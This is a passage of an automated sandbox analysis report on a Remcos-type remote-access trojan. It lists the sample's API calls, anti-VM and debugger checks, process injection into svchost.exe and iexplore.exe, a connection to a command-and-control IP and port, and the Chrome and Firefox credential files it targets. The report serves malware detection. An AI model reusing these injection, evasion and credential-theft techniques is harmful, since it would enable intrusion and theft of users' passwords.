                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7172Thread sleep count: 6426 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 7172Thread sleep time: -19278000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003A445A
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AC6D1 FindFirstFileW,FindClose,0_2_003AC6D1
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003AC75C
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AEF95
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AF0F2
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003AF3F3
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A37EF
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A3B12
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003ABCBC
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5445A GetFileAttributesW,FindFirstFileW,FindClose,2_2_00B5445A
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5C6D1 FindFirstFileW,FindClose,2_2_00B5C6D1
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00B5C75C
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B5EF95
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B5F0F2
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B5F3F3
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B537EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B537EF
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B53B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00B53B12
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B5BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B5BCBC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407877 FindFirstFileW,FindNextFileW,3_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0044E8F9 FindFirstFileExA,3_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0044E8F9 FindFirstFileExA,8_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,3_2_00407CD2
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003449A0
                  Source: OKkUGRkZV7.exe, 00000000.00000003.1318805540.000000000174F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe{1u
                  Source: ambiparous.exe, 00000002.00000003.1355847915.00000000011FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe@
                  Source: svchost.exe, 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
                  Source: ambiparous.exe, 00000007.00000002.1537726676.000000000136F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeAPI call chain: ExitProcess graph end nodegraph_0-101179
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003B3F09 BlockInput,0_2_003B3F09
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00343B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343B3A
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00375A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00375A7C
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00344B37 LoadLibraryA,GetProcAddress,0_2_00344B37
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_01697570 mov eax, dword ptr fs:[00000030h]0_2_01697570
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_01697510 mov eax, dword ptr fs:[00000030h]0_2_01697510
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_01695ED0 mov eax, dword ptr fs:[00000030h]0_2_01695ED0
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_01187178 mov eax, dword ptr fs:[00000030h]2_2_01187178
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_011887B8 mov eax, dword ptr fs:[00000030h]2_2_011887B8
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_01188818 mov eax, dword ptr fs:[00000030h]2_2_01188818
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00443355 mov eax, dword ptr fs:[00000030h]3_2_00443355
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3060 mov eax, dword ptr fs:[00000030h]4_2_02FD3060
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3060 mov eax, dword ptr fs:[00000030h]4_2_02FD3060
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3060 mov eax, dword ptr fs:[00000030h]4_2_02FD3060
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3060 mov eax, dword ptr fs:[00000030h]4_2_02FD3060
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3540 mov eax, dword ptr fs:[00000030h]4_2_02FD3540
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3540 mov eax, dword ptr fs:[00000030h]4_2_02FD3540
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD3540 mov eax, dword ptr fs:[00000030h]4_2_02FD3540
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD56A0 mov eax, dword ptr fs:[00000030h]4_2_02FD56A0
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD56A0 mov ecx, dword ptr fs:[00000030h]4_2_02FD56A0
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD4610 mov eax, dword ptr fs:[00000030h]4_2_02FD4610
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD4610 mov eax, dword ptr fs:[00000030h]4_2_02FD4610
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD4610 mov eax, dword ptr fs:[00000030h]4_2_02FD4610
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD4610 mov eax, dword ptr fs:[00000030h]4_2_02FD4610
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD4410 mov eax, dword ptr fs:[00000030h]4_2_02FD4410
                  Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 4_2_02FD4410 mov eax, dword ptr fs:[00000030h]4_2_02FD4410
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 7_2_012BA100 mov eax, dword ptr fs:[00000030h]7_2_012BA100
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 7_2_012BA160 mov eax, dword ptr fs:[00000030h]7_2_012BA160
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 7_2_012B8AC0 mov eax, dword ptr fs:[00000030h]7_2_012B8AC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00443355 mov eax, dword ptr fs:[00000030h]8_2_00443355
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_003980A9
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0036A124 SetUnhandledExceptionFilter,0_2_0036A124
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0036A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0036A155
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B1A124 SetUnhandledExceptionFilter,2_2_00B1A124
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeCode function: 2_2_00B1A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B1A155
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0043503C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00434A8A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0043BB71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00434BD8 SetUnhandledExceptionFilter,3_2_00434BD8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043503C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00434BD8 SetUnhandledExceptionFilter,8_2_00434BD8

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.3.64.152 2559Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,3_2_0041812A
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\Internet Explorer\iexplore.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F7008Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 30F0008Jump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E6A008Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe3_2_00412132
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_00412132
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003987B1 LogonUserW,0_2_003987B1
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00343B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343B3A
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_003448D7
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003A4C27 mouse_event,0_2_003A4C27
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OKkUGRkZV7.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\lecheries\ambiparous.exe "C:\Users\user\AppData\Local\lecheries\ambiparous.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\lecheries\ambiparous.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\lecheries\ambiparous.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00397CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00397CAF
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0039874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0039874B
                  Source: OKkUGRkZV7.exe, ambiparous.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: svchost.exe, 00000008.00000002.3786536893.0000000003236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9Y\
                  Source: OKkUGRkZV7.exe, ambiparous.exeBinary or memory string: Shell_TrayWnd
                  Source: svchost.exe, 00000008.00000002.3786536893.0000000003236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerP
                  Source: svchost.exe, 00000008.00000002.3786536893.0000000003236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerProgram Manager9Y\
                  Source: svchost.exe, 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSOR_REVISION=8f08Program Manager9Y\
                  Source: svchost.exe, 00000008.00000002.3786472852.0000000003231000.00000004.00000020.00020000.00000000.sdmp, logs.dat.8.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_0036862B cpuid 0_2_0036862B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,3_2_0045201B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,3_2_004520B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00452143
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,3_2_00452393
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,3_2_00448484
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_004524BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,3_2_004525C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00452690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,3_2_0044896D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,3_2_0040F90C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_00451D58
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,3_2_00451FD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,8_2_0045201B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,8_2_004520B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00452143
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,8_2_00452393
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,8_2_00448484
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_004524BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,8_2_004525C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00452690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,8_2_0044896D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,8_2_0040F90C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_00451D58
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,8_2_00451FD0
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00374E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00374E87
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00381E06 GetUserNameW,0_2_00381E06
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_00373F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00373F3A
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeCode function: 0_2_003449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003449A0
                  Source: C:\Users\user\Desktop\OKkUGRkZV7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.ambiparous.exe.39e0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.ambiparous.exe.3600000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3786705466.0000000004EDE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786396527.0000000003200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 7880, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ambiparous.exe PID: 8128, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8168, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data3_2_0040BA4D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_0040BA4D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\3_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db3_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db8_2_0040BB6B
                  Source: ambiparous.exeBinary or memory string: WIN_81
                  Source: ambiparous.exeBinary or memory string: WIN_XP
                  Source: ambiparous.exeBinary or memory string: WIN_XPe
                  Source: ambiparous.exeBinary or memory string: WIN_VISTA
                  Source: ambiparous.exeBinary or memory string: WIN_7
                  Source: ambiparous.exeBinary or memory string: WIN_8
